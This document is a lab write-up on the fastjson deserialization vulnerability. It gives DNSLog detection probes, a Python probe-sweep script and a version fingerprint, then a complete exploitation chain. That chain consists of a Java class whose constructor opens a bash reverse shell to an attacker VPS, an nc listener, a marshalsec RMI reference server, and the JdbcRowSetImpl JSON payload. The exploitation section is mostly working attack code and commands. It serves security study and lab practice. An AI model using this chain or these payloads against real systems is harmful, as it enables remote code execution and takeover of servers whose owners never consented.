1. Start the lab
2. Affected versions
fastjson <= 1.2.68 (this is the range the DNSLog detection in section 3 covers; the unmodified JdbcRowSetImpl payload used in section 4 only works on fastjson <= 1.2.24)
3. Detecting the vulnerability
Capture a request with Burp Suite, send it to Repeater, change the GET into a POST with Content-Type: application/json, and use the following body:
{
"zeo":{
"@type":"java.net.Inet4Address",
"val":"dnslog"
}
}
Create a DNSLog domain (for example on dnslog.cn), put it in val, send the request and refresh the DNSLog panel: a recorded DNS query means fastjson parsed the @type and resolved the hostname, so the target is running a vulnerable fastjson. Note that a DNS hit only proves that @type is honoured for these built-in java.net classes; whether an RCE chain is reachable still depends on the exact version and autoType settings.
The Burp Fastjson scanning plugin also reports the target as vulnerable.
Other detection methods
Fingerprint probe (deliberately truncated, send it exactly as shown): fastjson throws a JSONException, and if the application echoes the exception text the message identifies fastjson and usually ends with "fastjson-version 1.2.xx", which discloses the exact version:
{"@type":"java.lang.AutoCloseable"
DNSLog probes, one per java.net class that fastjson deserializes through a hostname (the domain below is the author's, replace it with your own):
{"rand1":{"@type":"java.net.InetAddress","val":"http://fastjson.fbi0tx.dnslog.cn"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"http://fastjson.fbi0tx.dnslog.cn"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"http://fastjson.fbi0tx.dnslog.cn"}}
{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://fastjson.fbi0tx.dnslog.cn"}}}
{"rand5":{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}}
Some malformed payloads still trigger the DNSLog lookup, because fastjson instantiates the @type object while parsing, before it reports the syntax error:
{"rand6":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://fastjson.fbi0tx.dnslog.cn"}}""}}
{"rand7":Set[{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}]}
{"rand8":Set[{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}
{"rand9":{"@type":"java.net.URL","val":"http://fastjson.fbi0tx.dnslog.cn"}:0
Check the DNSLog records: a hit from any of these probes confirms fastjson is processing @type.
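The detection steps above sent one hand-edited payload at a time. The script below, added here as an example and not code from the original write-up, sends the fingerprint probe and the DNSLog probes from this section in one sweep. It assumes TARGET_URL is the lab endpoint that passes the POST body to fastjson and DNSLOG_DOMAIN is a domain you control (for example one issued by dnslog.cn); each probe is given its own label as a leading subdomain, so the DNSLog panel shows which class actually performed the lookup, which the single shared domain in the write-up cannot tell you.

```python
"""Fastjson DNSLog probe sweep.

Added example for the detection steps above; it is not code from the original
write-up. Assumptions: TARGET_URL is the lab endpoint that hands the POST body
to fastjson, and DNSLOG_DOMAIN is a domain you control (e.g. one issued by
dnslog.cn). Each probe gets its own label as a leading subdomain, so the
DNSLog panel shows which class actually performed the lookup.
"""
import json
import re
import sys
import urllib.error
import urllib.request


def build_probes(dnslog_domain):
    """Return (label, body) pairs for the probes listed in the write-up.

    InetAddress-family probes take a bare hostname (fastjson hands the value to
    InetAddress.getByName); the java.net.URL probes take a full URL.
    """
    def host(label):
        return f"{label}.{dnslog_domain}"

    well_formed = [
        ("inet",  {"rand1": {"@type": "java.net.InetAddress",  "val": host("inet")}}),
        ("inet4", {"rand2": {"@type": "java.net.Inet4Address", "val": host("inet4")}}),
        ("inet6", {"rand3": {"@type": "java.net.Inet6Address", "val": host("inet6")}}),
        ("url",   {"rand5": {"@type": "java.net.URL", "val": "http://" + host("url")}}),
    ]
    probes = [(label, json.dumps(obj)) for label, obj in well_formed]
    # Deliberately malformed variants from the write-up: fastjson instantiates the
    # @type object before it reports the syntax error, so the lookup still happens.
    probes += [
        ("sockaddr", '{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"%s"}}}'
                     % host("sockaddr")),
        ("urlset",   '{"rand7":Set[{"@type":"java.net.URL","val":"http://%s"}]}' % host("urlset")),
        ("urlkey",   '{"rand9":{"@type":"java.net.URL","val":"http://%s"}:0' % host("urlkey")),
    ]
    return probes


def send(target_url, body, timeout=5):
    """POST one body as application/json; return (status, response_text).
    Connection errors come back as status None so one dead port does not stop the sweep."""
    req = urllib.request.Request(
        target_url, data=body.encode(), method="POST",
        headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")
    except (urllib.error.URLError, OSError) as e:
        return None, str(e)


# Truncated on purpose: fastjson raises a JSONException, and an application that
# echoes exception text usually reveals ", fastjson-version 1.2.xx".
FINGERPRINT = '{"@type":"java.lang.AutoCloseable"'
VERSION_RE = re.compile(r"fastjson-version\s+(\d+\.\d+\.\d+)")


def extract_fastjson_version(text):
    """Pull the version out of an echoed fastjson error, or None if it is not there."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def sweep(target_url, dnslog_domain):
    status, text = send(target_url, FINGERPRINT)
    version = extract_fastjson_version(text)
    print(f"[fingerprint] HTTP {status}, fastjson version: {version or 'not disclosed'}")
    for label, body in build_probes(dnslog_domain):
        status, _ = send(target_url, body)
        print(f"[{label:9}] HTTP {status}  -> look for {label}.{dnslog_domain} in DNSLog")
    print("A DNSLog hit proves fastjson resolved @type for a java.net class; "
          "it does not by itself prove an RCE chain.")


if __name__ == "__main__":
    sweep(sys.argv[1], sys.argv[2])   # python3 sweep.py http://target:8090/ abc123.dnslog.cn
```

The HTTP status codes are printed only for orientation; the result that matters is the DNSLog panel, since the target's HTTP response is the same whether or not the lookup happened.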
4. Exploitation
Save the following code as Exploit.java, replacing VPS_IP with the address of your own VPS. The reverse shell is launched from the constructor because the JNDI client instantiates the factory class through its no-argument constructor; main() is never executed on the target.
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {
    // Runs when the target's JNDI client instantiates this class as an object factory.
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{
            "bash", "-c", "bash -i >& /dev/tcp/VPS_IP/8888 0>&1"});
        // Relay the process output; this loop blocks until the shell exits,
        // which also keeps the target's HTTP request open for that long.
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    // Not used by the exploit chain; present only so the file is a normal Java program.
    public static void main(String[] args) throws Exception {
    }
}
Compile it with javac Exploit.java to produce Exploit.class. Compile with a JDK no newer than the target's runtime (or pass --release 8 on JDK 9+): a class file with a newer bytecode version fails on the target with UnsupportedClassVersionError, and the HTTP and RMI requests will arrive while no shell ever connects.
Put Exploit.class (the write-up copies Exploit.java alongside it, which is harmless but not needed) on your VPS and start a lightweight HTTP server in that directory:
python3 -m http.server 8080   (or, with Python 2: python -m SimpleHTTPServer 8080)
Open another window and listen on port 8888 for the reverse shell:
nc -lvvp 8888
Put the marshalsec jar on your VPS and start its RMI reference server with the command below. It answers the target's JNDI lookup with a Reference whose factory class Exploit is to be loaded from the HTTP server started above. Loading a factory class from a remote codebase over RMI requires com.sun.jndi.rmi.object.trustURLCodebase to be enabled on the target JVM, which has been off by default since JDK 8u121 / 7u131 / 6u141, so this step only works against older runtimes:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#Exploit 9999
Send the following JSON to the target server (fastjson <= 1.2.24). The field order matters: dataSourceName must be set before autoCommit, because setAutoCommit(true) calls connect(), which performs the JNDI lookup of dataSourceName. Burp Repeater recalculates Content-Length for you when the body changes.
POST / HTTP/1.1
Host: target_ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
  "b":{
    "@type":"com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName":"rmi://VPS_IP:9999/#Exploit",
    "autoCommit":true
  }
}
The reverse shell connects to the nc listener.